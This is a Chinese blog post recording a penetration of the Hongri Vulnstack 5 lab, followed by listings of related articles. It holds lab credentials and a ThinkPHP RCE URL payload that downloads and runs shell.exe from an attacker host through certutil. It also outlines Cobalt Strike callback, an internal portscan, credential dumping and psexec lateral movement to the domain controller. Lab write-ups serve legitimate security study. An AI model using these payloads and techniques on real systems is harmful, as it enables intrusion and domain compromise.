红日靶场五渗透记录

最新推荐文章于 2024-05-13 11:31:23 发布
最新推荐文章于 2024-05-13 11:31:23 发布
阅读量473 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63028223/article/details/128448688
版权

环境搭建:

靶场地址:漏洞详情

靶机Win7:192.168.192.196(网络边界)、192.168.138.135(内网IP)

靶机Win2008:192.168.138.138(DC)

win7 WEB账号密码:

sun\heart 123.com

sun\Administrator dc123.com

DC账号密码

sun\admin 2020.com

win7,web主机需要进入到c盘下启动phpstudy

win7自定义的net网卡,需要把自定义网段修改成自动。

渗透过程

通过访问发现是经典的Thinkphp框架。

工具扫描发现存在rce漏洞 

http://192.168.192.196/inDex.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=certutil -urlcache -split -f http://192.168.1.101/fly/shell.exe  //下载后门文件

http://192.168.192.196/inDex.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=shell.exe//执行

cs上线并提权:

 内网信息收集:

 发现存在域环境:

portscan 192.168.138.0/24 445 arp 50//扫描内网主机

 确认192.168.138.138为内网DC域控主机

 扫描DC端口:

 发现开启445端口开放:

 

横向移动:

抓取win7的账户账户密码:

 尝试psexec

新建监听器:

尝试psexece移动:

 

 成功上线:

 至此靶机环境全部拿下:

 

一个番茄锅
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红日靶场5wp
weixin_44339234的博客
11-17 870
红日靶场wp
ATT&CK红队评估(红日靶场
weixin_45682839的博客
04-30 1623
ATT&CK红队评估(红日靶场)通关攻略,涉及知识包括:ThinkPHP5.0 RCE漏洞、内网渗透、横向移动、psexec使用、代理建立,matespolit、cobaltstrike等工具使用。
红日内网渗透靶场5
qq_48039118的博客
03-30 340
我是一名网安小白,此篇文章如有错误,请评论指出!!!
红日靶场】vulnstack5-完整渗透过程_vulnhack
最新发布
2401_84972893的博客
05-13 755
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
红日靶场5
m0_58595840的博客
01-10 495
红日5内网渗透
红日靶场()
qq_58091216的博客
05-05 2440
3) 然后,我们修改域控主机的DSRM账户登录方式。我们可以在注册表的HKLM:\System\CurrentControlSet\Control\Lsa\中新建DsrmAdminLogonBehavior项进行设置,将该新建的项中的值设为0、1、2可以分别设置不同的DSRM账户登录方式。通过信息收集,目标主机所在的域环境,域名为sun.com,存在两台域主机DC和win7.DC的ip为:192.168.138.138,win7双网卡:192.168.135.150、192.168.138.136。
红日内网渗透靶场5(ATK&CK红队评估实战靶场)
qq_45780190的博客
04-24 4636
环境搭建: 第一次登录会提示需要更改账号密码。 win7账号密码: sun\heart 123.com sun\Administrator dc123.com ————————————————————————————————————————————————————————————— 2008账号密码 sun\admin 2020.com 外网采用NAT模式,内网采用仅主机模式。 添加一个主机模式用于内网,设置网段为192.168.138.0. NAT用于外网,设置网段为192.168.235.0
ATT&CK实战:红日靶场
学生
06-19 525
已完成 0/9 [-] mysql 192.168.138.130:3306 root 123456 Error 1130: Host 'win7.sun.com' is not allowed to connect to this MySQL server。存在域 sun.com 域控 192.168.138.120 Windows Server 2008 HPC Edition 7600。上传frp 搭建socks隧道。开启win7远程桌面 并连接。获取域内所有用户的hash。连接win7远程桌面。
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
红日安全-wp1
08-03
护网杯 Write up--红日安全迟来的签到base64 解密,得到如下结果:根据题目提示为 xor 异或,利用 c 语言撰写脚本利用 burp 爆破获得大辣
红日Web安全新手入门专刊.pdf
08-08
目录 1 web 安全新手入门指南 2 安全靶场实例分析
渗透思路奇思妙想 -simeon.pdf
02-25
2020年红日安全星火沙龙PPT渗透思路奇思妙想 -simeon.pdf
漏洞靶场平台搭建与漏洞分析文档
04-29
漏洞靶场平台搭建与漏洞分析文档,里面包含漏洞靶场网站的搭建、漏洞分析、工具使用、漏洞脚本样例,来源是红日安全,大家一起学习,进步!
红日靶场
红队是青春
12-02 6307
红日靶场关 一、环境配置 靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习。 虚拟机密码 win7 sun\heart 123.com sun\Administrator dc123.com # win7 web需要打开C盘里的phpstudy,最好关一下防火墙 2008 sun\admin 2020.com Win7双网卡模拟内外网 VMnet2网卡:192.168.25.0/24 外网 VMn
红日靶机vulnstack05【半总结】
qq_45300786的博客
10-07 298
网络模式 win7 DC2008
红日靶场(vulnstack5)渗透分析
记录学习,一起进步
09-03 910
红日靶场(vulnstack5)渗透分析
vulnstack()-红日靶场复现
BuNahua的博客
09-04 3211
说明:关于该复现中的问题欢迎vx交流:Bestboysendit 目录: 一、靶场信息: 二、外网渗透: 方式一: 方式二: 三、内网进攻: 四、痕迹清理: 、参考链接: 一、靶场信息: http://vulnstack.qiyuanxuetang.net/vuln/detail/7/ 此次靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习,此靶场主要用来学习,请大家遵守网络网络安全法。 描述 虚拟机密码
红日靶场】vulnstack5-完整渗透过程
信安是不可或缺的一部分!
10-20 2022
这个靶场还是比较简单使用cs很快就做完了,其中也发现有一些问题,像是cs插件的开机3389,试了很多次,最后找到原因很多的插件使用的是powershell开启的,但是低版本像2008没有这个,导致无法开启,后面使用注册表开启才行。
红日靶场系列】ATT&CK红队评估5
weixin_45632448的博客
09-29 1694
SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。
红日靶场下载csdn
08-13
红日靶场是一个很受欢迎的网络安全实验平台,用于学习和锻炼网络攻防技术。由于该平台所提供的安全实验环境包含了许多常见的漏洞和攻击场景,因此在安全爱好者和专业人士中间都非常受欢迎。 要下载红日靶场,首先...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值